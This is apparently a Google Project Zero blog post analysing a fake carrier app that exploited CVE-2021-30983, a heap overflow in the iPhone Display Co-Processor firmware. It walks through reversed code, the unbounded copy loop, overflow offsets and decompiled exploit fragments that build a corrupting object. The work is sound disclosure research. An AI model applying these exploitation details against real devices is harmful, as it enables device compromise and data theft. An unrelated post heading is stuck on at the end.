
The curious tale of a fake Carrier.app

23 June 2022 at 16:01

Posted by Ian Beer, Google Project Zero


NOTE: This issue, CVE-2021-30983, was fixed in iOS 15.2 in December 2021. 


Towards the end of 2021 Google's Threat Analysis Group (TAG) shared an iPhone app with me:

App splash screen showing the Vodafone carrier logo and the text My Vodafone.

App splash screen showing the Vodafone carrier logo and the text "My Vodafone" (not the legitimate Vodafone app)



Although this looks like the real My Vodafone carrier app available in the App Store, it didn't come from the App Store and is not the real application from Vodafone. TAG suspects that a target receives a link to this app in an SMS, after the attacker asks the carrier to disable the target's mobile data connection. The SMS claims that in order to restore mobile data connectivity, the target must install the carrier app and includes a link to download and install this fake app.


This sideloading works because the app is signed with an enterprise certificate, which can be purchased for $299 via the Apple Enterprise developer program. This program allows an eligible enterprise to obtain an Apple-signed embedded.mobileprovision file with the ProvisionsAllDevices key set. An app signed with the developer certificate embedded within that mobileprovision file can be sideloaded on any iPhone, bypassing Apple's App Store review process. While we understand that the Enterprise developer program is designed for companies to push "trusted apps" to their staff's iOS devices, in this case, it appears that it was being used to sideload this fake carrier app.


In collaboration with Project Zero, TAG has published an additional post with more details around the targeting and the actor. The rest of this blogpost is dedicated to the technical analysis of the app and the exploits contained therein.

App structure

The app is broken up into multiple frameworks. InjectionKit.framework is a generic privilege escalation exploit wrapper, exposing the primitives you'd expect (kernel memory access, entitlement injection, amfid bypasses) as well as higher-level operations like app installation, file creation and so on.


Agent.framework is partially obfuscated but, as the name suggests, seems to be a basic agent able to find and exfiltrate interesting files from the device like the Whatsapp messages database.


Six privilege escalation exploits are bundled with this app. Five are well-known, publicly available N-day exploits for older iOS versions. The sixth is not like those others at all.


This blog post is the story of the last exploit and the month-long journey to understand it.

Something's missing? Or am I missing something?

Although all the exploits were different, five of them shared a common high-level structure. An initial phase where the kernel heap was manipulated to control object placement. Then the triggering of a kernel vulnerability followed by well-known steps to turn that into something useful, perhaps by disclosing kernel memory then building an arbitrary kernel memory write primitive.


The sixth exploit didn't have anything like that.


Perhaps it could be triggering a kernel logic bug like Linus Henze's Fugu14 exploit, or a very bad memory safety issue which gave fairly direct kernel memory access. But neither of those seemed very plausible either. It looked, quite simply, like an iOS kernel exploit from a decade ago, except one which was first quite carefully checking that it was only running on an iPhone 12 or 13.


It contained log messages like:


  printf("Failed to prepare fake vtable: 0x%08x", ret);


which seemed to happen far earlier than the exploit could possibly have defeated mitigations like KASLR and PAC.


Shortly after that was this log message:


  printf("Waiting for R/W primitives...");


Why would you need to wait?


Then shortly after that:


  printf("Memory read/write and callfunc primitives ready!");


Up to that point the exploit made only four IOConnectCallMethod calls and there were no other obvious attempts at heap manipulation. But there was another log message which started to shed some light:


  printf("Unexpected data read from DCP: 0x%08x", v49);

DCP?

In October 2021 Adam Donenfeld tweeted this:


Screenshot of Tweet from @doadam on 11 Oct 2021, which is a retweet from @AmarSaar on 11 October 2021. The tweet from @AmarSaar reads 'So, another IOMFB vulnerability was exploited ITW (15.0.2). I bindiffed the patch and built a POC. And, because it's a great bug, I just finished writing a short blogpost with the tech details, to share this knowledge :) Check it out! https://saaramar.github.io/IOMFB_integer_overflow_poc/' and the retweet from @doadam reads 'This has been moved to the display coprocessor (DCP) starting from 15, at least on iPhone 12 (and most probably other ones as well)'.

DCP is the "Display Co-Processor" which ships with iPhone 12 and above and all M1 Macs.


There's little public information about the DCP; the most comprehensive comes from the Asahi Linux project, which is porting Linux to M1 Macs. In their August 2021 and September 2021 updates they discussed their DCP reverse-engineering efforts and the open-source DCP client written by @alyssarzg. Asahi describe the DCP like this:


On most mobile SoCs, the display controller is just a piece of hardware with simple registers. While this is true on the M1 as well, Apple decided to give it a twist. They added a coprocessor to the display engine (called DCP), which runs its own firmware (initialized by the system bootloader), and moved most of the display driver into the coprocessor. But instead of doing it at a natural driver boundary… they took half of their macOS C++ driver, moved it into the DCP, and created a remote procedure call interface so that each half can call methods on C++ objects on the other CPU!

https://asahilinux.org/2021/08/progress-report-august-2021/


The Asahi Linux project reverse-engineered the API to talk to the DCP but they are restricted to using Apple's DCP firmware (loaded by iBoot) - they can't use a custom DCP firmware. Consequently their documentation is limited to the DCP RPC API with few details of the DCP internals.

Setting the stage

Before diving into DCP internals it's worth stepping back a little. What even is a co-processor in a modern, highly integrated SoC (System-on-a-Chip) and what might the consequences of compromising it be?


Years ago a co-processor would likely have been a physically separate chip. Nowadays a large number of these co-processors are integrated along with their interconnects directly onto a single die, even if they remain fairly independent systems. We can see in this M1 die shot from Tech Insights that the CPU cores in the middle and right hand side take up only around 10% of the die:

M1 die-shot from techinsights.com with possible location of DCP highlighted.

M1 die-shot from techinsights.com with possible location of DCP added

https://www.techinsights.com/blog/two-new-apple-socs-two-market-events-apple-a14-and-m1


Companies like SystemPlus perform very thorough analysis of these dies. Based on their analysis the DCP is likely the rectangular region indicated on this M1 die. It takes up around the same amount of space as the four high-efficiency cores seen in the centre, though it seems to be mostly SRAM.


With just this low-resolution image it's not really possible to say much more about the functionality or capabilities of the DCP and what level of system access it has. To answer those questions we'll need to take a look at the firmware.

My kingdom for a .dSYM!

The first step is to get the DCP firmware image. iPhones (and now M1 macs) use .ipsw files for system images. An .ipsw is really just a .zip archive and the Firmware/ folder in the extracted .zip contains all the firmware for the co-processors, modems etc. The DCP firmware is this file:



  Firmware/dcp/iphone13dcp.im4p


The im4p in this case is just a 25 byte header which we can discard:


  $ dd if=iphone13dcp.im4p of=iphone13dcp bs=25 skip=1

  $ file iphone13dcp

  iphone13dcp: Mach-O 64-bit preload executable arm64


It's a Mach-O! Running nm -a to list all symbols shows that the binary has been fully stripped:


  $ nm -a iphone13dcp

  iphone13dcp: no symbols


Function names make understanding code significantly easier. From looking at the handful of strings in the exploit some of them looked like they might be referencing symbols in a DCP firmware image ("M3_CA_ResponseLUT read: 0x%08x" for example) so I thought perhaps there might be a DCP firmware image where the symbols hadn't been stripped.


Since the firmware images are distributed as .zip files and Apple's servers support range requests, with a bit of Python and the partialzip tool we can relatively easily and quickly get every beta and release DCP firmware. I checked over 300 distinct images; every single one was stripped.
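
As an illustration, here's roughly what such a fetch loop can look like (this sketch uses the third-party remotezip package as a stand-in for partialzip; the list of .ipsw URLs is assumed to come from elsewhere, e.g. the ipsw.me API):

  # pip install remotezip -- uses HTTP range requests, so the full .ipsw is never downloaded
  from remotezip import RemoteZip

  DCP_PATH = "Firmware/dcp/iphone13dcp.im4p"

  def fetch_dcp(ipsw_url, out_path):
      with RemoteZip(ipsw_url) as z:          # fetches only the central directory...
          with z.open(DCP_PATH) as src:       # ...plus the single member we want
              with open(out_path, "wb") as dst:
                  dst.write(src.read())

  # ipsw_urls is assumed to be a list of beta/release .ipsw URLs collected separately
  for i, url in enumerate(ipsw_urls):
      fetch_dcp(url, f"dcp_{i:04}.im4p")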


Guess we'll have to do this the hard way!

Day 1; Instruction 1

$ otool -h raw_fw/iphone13dcp

raw_fw/iphone13dcp:

Mach header

magic      cputype   cpusubtype caps filetype ncmds sizeofcmds flags

0xfeedfacf 0x100000C 0          0x00 5        5     2240       0x00000001


That cputype is plain arm64 (ArmV8) without pointer authentication support. The binary is fairly large (3.7MB) and IDA's autoanalysis detects over 7000 functions.


With any brand new binary I usually start with a brief look through the function names and the strings. The binary is stripped so there are no function name symbols but there are plenty of C++ function names as strings:


A short list of C++ prototypes like IOMFB::UPBlock_ALSS::init(IOMFB::UPPipe *).

The cross-references to those strings look like this:


log(0x40000001LL,

    "UPBlock_ALSS.cpp",

    341,

    "%s: capture buffer exhausted, aborting capture\n",

    "void IOMFB::UPBlock_ALSS::send_data(uint64_t, uint32_t)");


This is almost certainly a logging macro which expands __FILE__, __LINE__ and __PRETTY_FUNCTION__. This allows us to start renaming functions and finding vtable pointers.

Object structure

From the Asahi linux blog posts we know that the DCP is using an Apple-proprietary RTOS called RTKit for which there is very little public information. There are some strings in the binary with the exact version:


ADD  X8, X8, #aLocalIphone13d@PAGEOFF ; "local-iphone13dcp.release"

ADD  X9, X9, #aRtkitIos182640@PAGEOFF ; "RTKit_iOS-1826.40.9.debug"


The code appears to be predominantly C++. There appear to be multiple C++ object hierarchies; those involved with this vulnerability look a bit like IOKit C++ objects. Their common base class looks like this:


struct __cppobj RTKIT_RC_RTTI_BASE

{

  RTKIT_RC_RTTI_BASE_vtbl *__vftable /*VFT*/;

  uint32_t refcnt;

  uint32_t typeid;

};


(These structure definitions are in the format IDA uses for C++-like objects)


The RTKit base class has a vtable pointer, a reference count and a four-byte Run Time Type Information (RTTI) field - a 4-byte ASCII identifier like BLHA, WOLO, MMAP, UNPI, OSST, OSBO and so on. These identifiers look a bit cryptic but they're quite descriptive once you figure them out (and I'll describe the relevant ones as we encounter them.)
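
Since those identifiers are just four ASCII bytes packed into the typeid field, a tiny helper makes it easy to flip between the integer seen in the disassembly and the readable form (a sketch; the byte order is assumed to be little-endian as stored in memory):

  import struct

  def typeid_to_str(value, little_endian=True):
      # e.g. typeid_to_str(0x41484C42) -> 'BLHA' (assuming little-endian storage)
      return struct.pack("<I" if little_endian else ">I", value).decode("ascii", "replace")

  def str_to_typeid(name, little_endian=True):
      return struct.unpack("<I" if little_endian else ">I", name.encode("ascii"))[0]

  print(hex(str_to_typeid("BLHA")))   # handy when searching the firmware for a given type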


The base type has the following associated vtable:


struct /*VFT*/ RTKIT_RC_RTTI_BASE_vtbl

{

  void (__cdecl *take_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *drop_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *take_global_type_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *drop_global_type_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *getClassName)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *dtor_a)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *unk)(RTKIT_RC_RTTI_BASE *this);

};

Exploit flow

The exploit running in the app starts by opening an IOKit user client for the AppleCLCD2 service. AppleCLCD seems to be the application processor version of IOMobileFrameBuffer, and AppleCLCD2 the DCP version.


The exploit only calls 3 different external method selectors on the AppleCLCD2 user client: 68, 78 and 79.


The one with the largest and most interesting-looking input is 78, which corresponds to this user client method in the kernel driver:


IOReturn

IOMobileFramebufferUserClient::s_set_block(

  IOMobileFramebufferUserClient *this,

  void *reference,

  IOExternalMethodArguments *args)

{

  const unsigned __int64 *extra_args;

  u8 *structureInput;

  structureInput = args->structureInput;

  if ( structureInput && args->scalarInputCount >= 2 )

  {

    if ( args->scalarInputCount == 2 )

      extra_args = 0LL;

    else

      extra_args = args->scalarInput + 2;

    return this->framebuffer_ap->set_block_dcp(

             this->task,

             args->scalarInput[0],

             args->scalarInput[1],

             extra_args,

             args->scalarInputCount - 2,

             structureInput,

             args->structureInputSize);

  } else {

    return 0xE00002C2;

  }

}


This unpacks the IOConnectCallMethod arguments and passes them to:


IOMobileFramebufferAP::set_block_dcp(

        IOMobileFramebufferAP *this,

        task *task,

        int first_scalar_input,

        int second_scalar_input,

        const unsigned __int64 *pointer_to_remaining_scalar_inputs,

        unsigned int scalar_input_count_minus_2,

        const unsigned __int8 *struct_input,

        unsigned __int64 struct_input_size)


This method uses some autogenerated code to serialise the external method arguments into a buffer like this:


arg_struct:

{

  struct task* task

  u64 scalar_input_0

  u64 scalar_input_1

  u64[] remaining_scalar_inputs

  u64 cntExtraScalars

  u8[] structInput

  u64 CntStructInput

}


which is then passed to UnifiedPipeline2::rpc along with a 4-byte ASCII method identifier ('A435' here):


UnifiedPipeline2::rpc(

      'A435',

      arg_struct,

      0x105Cu,

      &retval_buf,

      4u);


UnifiedPipeline2::rpc calls DCPLink::rpc which calls AppleDCPLinkService::rpc to perform one more level of serialisation which packs the method identifier and a "stream identifier" together with the arg_struct shown above.


AppleDCPLinkService::rpc then calls rpc_caller_gated to allocate space in a shared memory buffer, copy the buffer into there then signal to the DCP that a message is available.


Effectively the implementation of the IOMobileFramebuffer user client has been moved on to the DCP and the external method interface is now a proxy shim, via shared memory, to the actual implementations of the external methods which run on the DCP.

Exploit flow: the other side

The next challenge is to find where the messages start being processed on the DCP. Looking through the log strings there's a function which is clearly called rpc_callee_gated - quite likely that's the receive side of the function rpc_caller_gated we saw earlier.


rpc_callee_gated unpacks the wire format then has an enormous switch statement which maps all the 4-letter RPC codes to function pointers:


      switch ( rpc_id )

      {

        case 'A000':

          goto LABEL_146;

        case 'A001':

          handler_fptr = callback_handler_A001;

          break;

        case 'A002':

          handler_fptr = callback_handler_A002;

          break;

        case 'A003':

          handler_fptr = callback_handler_A003;

          break;

        case 'A004':

          handler_fptr = callback_handler_A004;

          break;

        case 'A005':

          handler_fptr = callback_handler_A005;

          break;


At the bottom of this switch statement is the invocation of the callback handler:


ret = handler_fptr(

          meta,

          in_struct_ptr,

          in_struct_size,

          out_struct_ptr,

          out_struct_size);


in_struct_ptr points to a copy of the serialised IOConnectCallMethod arguments we saw being serialized earlier on the application processor:


arg_struct:

{

  struct task* task

  u64 scalar_input_0

  u64 scalar_input_1

  u64[] remaining_scalar_inputs

  u32 cntExtraScalars

  u8[] structInput

  u64 cntStructInput

}


The callback unpacks that buffer and calls a C++ virtual function:


unsigned int

callback_handler_A435(

  u8* meta,

  void *args,

  uint32_t args_size,

  void *out_struct_ptr,

  uint32_t out_struct_size)

{

  int64 instance_id;

  uint64_t instance;

  int err;

  int retval;

  unsigned int result;

  instance_id = meta->instance_id;

  instance =

    global_instance_table[instance_id].IOMobileFramebufferType;

  if ( !instance ) {

    log_fatal(

      "IOMFB: %s: no instance for instance ID: %u\n",

      "static T *IOMFB::InstanceTracker::instance"

        "(IOMFB::InstanceTracker::tracked_entity_t, uint32_t)"

        " [T = IOMobileFramebuffer]",

      instance_id);

  }

  err = (instance-16)->vtable_0x378( // virtual call

         (instance-16),

         args->task,

         args->scalar_input_0,

         args->scalar_input_1,

         args->remaining_scalar_inputs,

         args->cntExtraScalars,

         args->structInput,

         args->cntStructInput);

  retval = convert_error(err);

  result = 0;

  *(_DWORD *)out_struct_ptr = retval;

  return result;

}


The challenge here is to figure out where that virtual call goes. The object is being looked up in a global table based on the instance id. We can't just set a breakpoint, and whilst emulating the firmware is probably possible, that would likely be a long project in itself. I took a hackier approach: we know that the vtable needs to be at least 0x380 bytes large, so just go through all those vtables, decompile them and see if the prototypes look reasonable!
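
A rough IDAPython sketch of that search (the candidate_vtables list is an assumption here, e.g. collected beforehand from the vtable pointers found via the logging strings):

  import idc
  import ida_hexrays

  SLOT = 0x378  # offset of the virtual call made by callback_handler_A435

  for vt in candidate_vtables:          # assumed to be gathered beforehand
      fptr = idc.get_qword(vt + SLOT)
      if not fptr:
          continue
      try:
          cfunc = ida_hexrays.decompile(fptr)
      except ida_hexrays.DecompilationFailure:
          continue
      # eyeball the prototype: we want (this, task*, scalar, scalar, scalar*, count, u8*, size)
      print(hex(vt), cfunc.print_dcl())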


There's one clear match in the vtable for the UNPI type:

UNPI::set_block(

        UNPI* this,

        struct task* caller_task_ptr,

        unsigned int first_scalar_input,

        int second_scalar_input,

        int *remaining_scalar_inputs,

        uint32_t cnt_remaining_scalar_inputs,

        uint8_t *structure_input_buffer,

        uint64_t structure_input_size)


Here's my reversed implementation of UNPI::set_block:

UNPI::set_block(

        UNPI* this,

        struct task* caller_task_ptr,

        unsigned int first_scalar_input,

        int second_scalar_input,

        int *remaining_scalar_inputs,

        uint32_t cnt_remaining_scalar_inputs,

        uint8_t *structure_input_buffer,

        uint64_t structure_input_size)

{

  struct block_handler_holder *holder;

  struct metadispatcher metadisp;

  if ( second_scalar_input )

    return 0x80000001LL;

  holder = this->UPPipeDCP_H13P->block_handler_holders;

  if ( !holder )

    return 0x8000000BLL;

  metadisp.address_of_some_zerofill_static_buffer = &unk_3B8D18;

  metadisp.handlers_holder = holder;

  metadisp.structure_input_buffer = structure_input_buffer;

  metadisp.structure_input_size = structure_input_size;

  metadisp.remaining_scalar_inputs = remaining_scalar_inputs;

  metadisp.cnt_remaining_sclar_input = cnt_remaining_scalar_inputs;

  metadisp.some_flags = 0x40000000LL;

  metadisp.dispatcher_fptr = a_dispatcher;

  metadisp.offset_of_something_which_looks_serialization_related = &off_1C1308;

  return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);

}


This method wraps up the arguments into another structure I've called metadispatcher:


struct __attribute__((aligned(8))) metadispatcher

{

 uint64_t address_of_some_zerofill_static_buffer;

 uint64_t some_flags;

 __int64 (__fastcall *dispatcher_fptr)(struct metadispatcher *, struct BlockHandler *, __int64, _QWORD);

 uint64_t offset_of_something_which_looks_serialization_related;

 struct block_handler_holder *handlers_holder;

 uint64_t structure_input_buffer;

 uint64_t structure_input_size;

 uint64_t remaining_scalar_inputs;

 uint32_t cnt_remaining_sclar_input;

};


That metadispatcher object is then passed to this method:


return metadispatch(holder, first_scalar_input, 1, caller_task_ptr, structure_input_buffer, &metadisp, 0);


In there we reach this code:


  block_type_handler = lookup_a_handler_for_block_type_and_subtype(

                         a1,

                         first_scalar_input, // block_type

                         a3);                // subtype


The exploit calls this set_block external method twice, passing two different values for first_scalar_input, 7 and 19. Here we can see that those correspond to looking up two different block handler objects.


The lookup function searches a linked list of block handler structures; the head of the list is stored at offset 0x1448 in the UPPipeDCP_H13P object and registered dynamically by a method I've named add_handler_for_block_type:


add_handler_for_block_type(struct block_handler_holder *handler_list,

                           struct BlockHandler *handler)

The logging code tells us that this is in a file called IOMFBBlockManager.cpp. IDA finds 44 cross-references to this method, indicating that there are probably that many different block handlers. The structure of each registered block handler is something like this:


struct __cppobj BlockHandler : RTKIT_RC_RTTI_BASE

{

  uint64_t field_16;

  struct handler_inner_types_entry *inner_types_array;

  uint32_t n_inner_types_array_entries;

  uint32_t field_36;

  uint8_t can_run_without_commandgate;

  uint32_t block_type;

  uint64_t list_link;

  uint64_t list_other_link;

  uint32_t some_other_type_field;

  uint32_t some_other_type_field2;

  uint32_t expected_structure_io_size;

  uint32_t field_76;

  uint64_t getBlock_Impl;

  uint64_t setBlock_Impl;

  uint64_t field_96;

  uint64_t back_ptr_to_UPPipeDCP_H13P;

};


The RTTI type is BLHA (BLock HAndler.)


For example, here's the codepath which builds and registers block handler type 24:


BLHA_24 = (struct BlockHandler *)CXXnew(112LL);

BLHA_24->__vftable = (BlockHandler_vtbl *)BLHA_super_vtable;

BLHA_24->block_type = 24;

BLHA_24->refcnt = 1;

BLHA_24->can_run_without_commandgate = 0;

BLHA_24->some_other_type_field = 0LL;

BLHA_24->expected_structure_io_size = 0xD20;

typeid = typeid_BLHA();

BLHA_24->typeid = typeid;

modify_typeid_ref(typeid, 1);

BLHA_24->__vftable = vtable_BLHA_subclass_type_24;

BLHA_24->inner_types_array = 0LL;

BLHA_24->n_inner_types_array_entries = 0;

BLHA_24->getBlock_Impl = BLHA_24_getBlock_Impl;

BLHA_24->setBlock_Impl = BLHA_24_setBlock_Impl;

BLHA_24->field_96 = 0LL;

BLHA_24->back_ptr_to_UPPipeDCP_H13P = a1;

add_handler_for_block_type(list_holder, BLHA_24);


Each block handler optionally has getBlock_Impl and setBlock_Impl function pointers which appear to implement the actual setting and getting operations.


We can go through all the callsites which add block handlers; tell IDA the type of the arguments and name all the getBlock and setBlock implementations:


The IDA Pro Names window showing a list of symbols like BLHA_15_getBlock_Impl.

You can perhaps see where this is going: that's looking like really quite a lot of reachable attack surface! Each of those setBlock_Impl functions is reachable by passing a different value for the first scalar argument to IOConnectCallMethod 78.


There's a little bit more reversing though to figure out how exactly to get controlled bytes to those setBlock_Impl functions:

Memory Mapping

The raw "block" input to each of those setBlock_Impl methods isn't passed inline in the IOConnectCallMethod structure input. There's another level of indirection: each individual block handler structure has an array of supported "subtypes" which contains metadata detailing where to find the (userspace) pointer to that subtype's input data in the IOConnectCallMethod structure input. The first dword in the structure input is the id of this subtype - in this case for the block handler type 19 the metadata array has a single entry:


<2, 0, 0x5F8, 0x600>


The first value (2) is the subtype id and 0x5f8 and 0x600 tell the DCP from what offset in the structure input data to read a pointer and size from. The DCP then requests a memory mapping from the AP for that memory from the calling task:


return wrap_MemoryDescriptor::withAddressRange(

  *(void*)(structure_input_buffer + addr_offset),

  *(unsigned int *)(structure_input_buffer + size_offset),

  caller_task_ptr);


We saw earlier that the AP sends the DCP the struct task pointer of the calling task; when the DCP requests a memory mapping from a user task it sends those raw task struct pointers back to the AP such that the kernel can perform the mapping from the correct task. The memory mapping is abstracted as an MDES object on the DCP side; the implementation of the mapping involves the DCP making an RPC to the AP:


make_link_call('D453', &req, 0x20, &resp, 0x14);


which corresponds to a call to this method on the AP side:


IOMFB::MemDescRelay::withAddressRange(unsigned long long, unsigned long long, unsigned int, task*, unsigned long*, unsigned long long*)


The DCP calls ::prepare and ::map on the returned MDES object (exactly like an IOMemoryDescriptor object in IOKit), gets the mapped pointer and size to pass via a few final levels of indirection to the block handler:


a_descriptor_with_controlled_stuff->dispatcher_fptr(

  a_descriptor_with_controlled_stuff,

  block_type_handler,

  important_ptr,

  important_size);


where the dispatcher_fptr looks like this:


a_dispatcher(

        struct metadispatcher *disp,

        struct BlockHandler *block_handler,

        __int64 controlled_ptr,

        unsigned int controlled_size)

{

  return block_handler->BlockHandler_setBlock(

           block_handler,

           disp->structure_input_buffer,

           disp->structure_input_size,

           disp->remaining_scalar_inputs,

           disp->cnt_remaining_sclar_input,

           disp->handlers_holder->gate,

           controlled_ptr,

           controlled_size);

}


You can see here just how useful it is to keep making structure definitions while reversing; there are so many levels of indirection that it's pretty much impossible to keep it all in your head.


BlockHandler_setBlock is a virtual method on BLHA. This is the implementation for BLHA 19:


BlockHandler19::setBlock(

  struct BlockHandler *this,

  void *structure_input_buffer,

  int64 structure_input_size,

  int64 *remaining_scalar_inputs,

  unsigned int cnt_remaining_scalar_inputs,

  struct CommandGate *gate,

  void* mapped_mdesc_ptr,

  unsigned int mapped_mdesc_length)


This uses a Command Gate (GATI) object (like a call gate in IOKit to serialise calls) to finally get close to actually calling the setBlock_Impl function.


We need to reverse the gate_context structure to follow the controlled data through the gate:


struct __attribute__((aligned(8))) gate_context

{

 struct BlockHandler *the_target_this;

 uint64_t structure_input_buffer;

 void *remaining_scalar_inputs;

 uint32_t cnt_remaining_scalar_inputs;

 uint32_t field_28;

 uint64_t controlled_ptr;

 uint32_t controlled_length;

};


The callgate object uses that context object to finally call the BLHA setBlock handler:


callback_used_by_callgate_in_block_19_setBlock(

  struct UnifiedPipeline *parent_pipeline,

  struct gate_context *context,

  int64 a3,

  int64 a4,

  int64 a5)

{

  return (context->the_target_this->setBlock_Impl)(

           context->the_target_this->back_ptr_to_UPPipeDCP_H13P,

           context->structure_input_buffer,

           context->remaining_scalar_inputs,

           context->cnt_remaining_scalar_inputs,

           context->controlled_ptr,

           context->controlled_length);

}

SetBlock_Impl

And finally we've made it through the whole callstack following the controlled data from IOConnectCallMethod in userspace on the AP to the setBlock_Impl methods on the DCP!


The prototype of the setBlock_Impl methods looks like this:


setBlock_Impl(struct UPPipeDCP_H13P *pipe_parent,

              void *structure_input_buffer,

              int *remaining_scalar_inputs,

              int cnt_remaining_scalar_inputs,

              void* ptr_via_memdesc,

              unsigned int len_of_memdesc_mapped_buf)


The exploit calls two setBlock_Impl methods; 7 and 19. 7 is fairly simple and seems to just be used to put controlled data in a known location. 19 is the buggy one. From the log strings we can tell that block type 19 handler is implemented in a file called UniformityCompensator.cpp.


Uniformity Compensation is a way to correct for inconsistencies in brightness and colour reproduction across a display panel. Block type 19 sets and gets a data structure containing this correction information. The setBlock_Impl method calls UniformityCompensator::set and reaches the following code snippet where controlled_size is a fully-controlled u32 value read from the structure input and indirect_buffer_ptr points to the mapped buffer, the contents of which are also controlled:

uint8_t* pages = compensator->inline_buffer; // +0x24

for (int pg_cnt = 0; pg_cnt < 3; pg_cnt++) {

  uint8_t* this_page = pages;

  for (int i = 0; i < controlled_size; i++) {

    memcpy(this_page, indirect_buffer_ptr, 4 * controlled_size);

    indirect_buffer_ptr += 4 * controlled_size;

    this_page += 0x100;

  }

  pages += 0x4000;

}

There's a distinct lack of bounds checking on controlled_size. Based on the structure of the code it looks like it should be restricted to be less than or equal to 64 (as that would result in the input being completely copied to the output buffer.) The compensator->inline_buffer buffer is inline in the compensator object. The structure of the code makes it look like that buffer is probably 0xc000 (three 16k pages) large. To verify this we need to find the allocation site of this compensator object.


It's read from the pipe_parent object and we know that at this point pipe_parent is a UPPipeDCP_H13P object.


There's only one write to that field, here in UPPipeDCP_H13P::setup_tunables_base_target:


compensator = CXXnew(0xC608LL);

...

this->compensator = compensator;


The compensator object is a 0xc608 byte allocation; the 0xc000 sized buffer starts at offset 0x24 so the allocation has enough space for 0xc608-0x24=0xC5E4 bytes before corrupting neighbouring objects.


The structure input provided by the exploit for the block handler 19 setBlock call looks like this:


struct_input_for_block_handler_19[0x5F4] = 70; // controlled_size

struct_input_for_block_handler_19[0x5F8] = address;

struct_input_for_block_handler_19[0x600] = a_size;


This leads to a value of 70 (0x46) for controlled_size in the UniformityCompensator::set snippet shown earlier. (0x5f8 and 0x600 correspond to the offsets we saw earlier in the subtype's table:  <2, 0, 0x5F8, 0x600>)


The inner loop increments the destination pointer by 0x100 each iteration so 0x46 loop iterations will write 0x4618 bytes.


The outer loop writes to three subsequent 0x4000 byte blocks so the third (final) iteration starts writing at 0x24 + 0x8000 and writes a total of 0x4618 bytes, meaning the object would need to be 0xC63C bytes; but we can see that it's only 0xc608, meaning that it will overflow the allocation size by 0x34 bytes. The RTKit malloc implementation looks like it adds 8 bytes of metadata to each allocation so the next object starts at 0xc610.


How much input is consumed? The input is fully consumed with no "rewinding" so it's 3*0x46*0x46*4 = 0xe5b0 bytes. Working backwards from the end of that buffer we know that the final 0x34 bytes of it go off the end of the 0xc608 allocation which means +0xe57c in the input buffer will be the first byte which corrupts the 8 metadata bytes and +0xe584 will be the first byte to corrupt the next object:


A diagram showing that the end of the overflower object overlaps with the metadata and start of the target object.
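
A quick sanity check of those offsets (plain Python, mirroring the arithmetic above):

  controlled_size = 0x46        # value placed at +0x5F4 of the structure input
  alloc_size      = 0xC608      # CXXnew(0xC608) for the compensator object
  buf_offset      = 0x24        # inline_buffer starts here

  consumed = 3 * controlled_size * controlled_size * 4
  end = buf_offset + 2 * 0x4000 + (controlled_size - 1) * 0x100 + 4 * controlled_size

  print(hex(consumed))              # 0xe5b0 bytes of input consumed
  print(hex(end - alloc_size))      # 0x34 bytes written past the allocation
  print(hex(consumed - 0x34))       # 0xe57c: first input byte to hit the heap metadata
  print(hex(consumed - 0x34 + 8))   # 0xe584: first input byte to hit the next object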

This matches up exactly with the overflow object which the exploit builds:


  v24 = address + 0xE584;

  v25 = *(_DWORD *)&v54[48];

  v26 = *(_OWORD *)&v54[32];

  v27 = *(_OWORD *)&v54[16];

  *(_OWORD *)(address + 0xE584) = *(_OWORD *)v54;

  *(_OWORD *)(v24 + 16) = v27;

  *(_OWORD *)(v24 + 32) = v26;

  *(_DWORD *)(v24 + 48) = v25;


The destination object seems to be allocated very early and the DCP RTKit environment appears to be very deterministic with no ASLR. Almost certainly they are attempting to corrupt a neighbouring C++ object with a fake vtable pointer.


Unfortunately for our analysis the trail goes cold here and we can't fully recreate the rest of the exploit. The bytes for the fake DCP C++ object are read from a file in the app's temporary directory (base64 encoded inside a JSON file under the exploit_struct_offsets key) and I don't have a copy of that file. But based on the flow of the rest of the exploit it's pretty clear what happens next:

sudo make me a DART mapping

The DCP, like other coprocessors on iPhone, sits behind a DART (Device Address Resolution Table.) This is like an SMMU (IOMMU in the x86 world) which forces an extra layer of physical address lookup between the DCP and physical memory. DART was covered in great detail in Gal Beniamini's Over The Air - Vol. 2, Pt. 3 blog post.


The DCP clearly needs to access lots of buffers owned by userspace tasks as well as memory managed by the kernel. To do this the DCP makes RPC calls back to the AP which modifies the DART entries accordingly. This appears to be exactly what the DCP exploit does: the D45X family of DCP->AP RPC methods appear to expose an interface for requesting arbitrary physical as well as virtual addresses to be mapped into the DCP DART.


The fake C++ object is most likely a stub which makes such calls on behalf of the exploit, allowing the exploit to read and write kernel memory.

Conclusions

Segmentation and isolation are in general a positive thing when it comes to security. However, splitting up an existing system into separate, intercommunicating parts can end up exposing unexpected code in unexpected ways.


We've had discussions within Project Zero about whether this DCP vulnerability is interesting at all. After all, if the UniformityCompensator code was going to be running on the Application Processors anyway then the Display Co-Processor didn't really introduce or cause this bug.


Whilst that's true, it's also the case that the DCP certainly made exploitation of this bug significantly easier and more reliable than it would have been on the AP. Apple has invested heavily in memory corruption mitigations over the last few years, so moving an attack surface from a "mitigation heavy" environment to a "mitigation light" one is a regression in that sense.


Another perspective is that the DCP just isn't isolated enough; perhaps the intention was to try to isolate the code on the DCP such that even if it's compromised it's limited in the effect it could have on the entire system. For example, there might be models where the DCP to AP RPC interface is much more restricted.


But again there's a tradeoff: the more restrictive the RPC API, the more the DCP code has to be refactored - a significant investment. Currently, the codebase relies on being able to map arbitrary memory and the API involves passing userspace pointers back and forth.


I've discussed in recent posts how attackers tend to be ahead of the curve. As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too. We saw that in the logic-bug sandbox escape used by NSO and we see that here in this memory-corruption-based privilege escalation that side-stepped kernel mitigations by corrupting memory on a co-processor instead. Both are quite likely to continue working in some form in a post-memory tagging world. Both reveal the stunning depth of attack surface available to the motivated attacker. And both show that defensive security research still has a lot of work to do.

Cortex XSOAR Tips & Tricks – Creating indicator relationships in automations

23 June 2022 at 08:00

Introduction

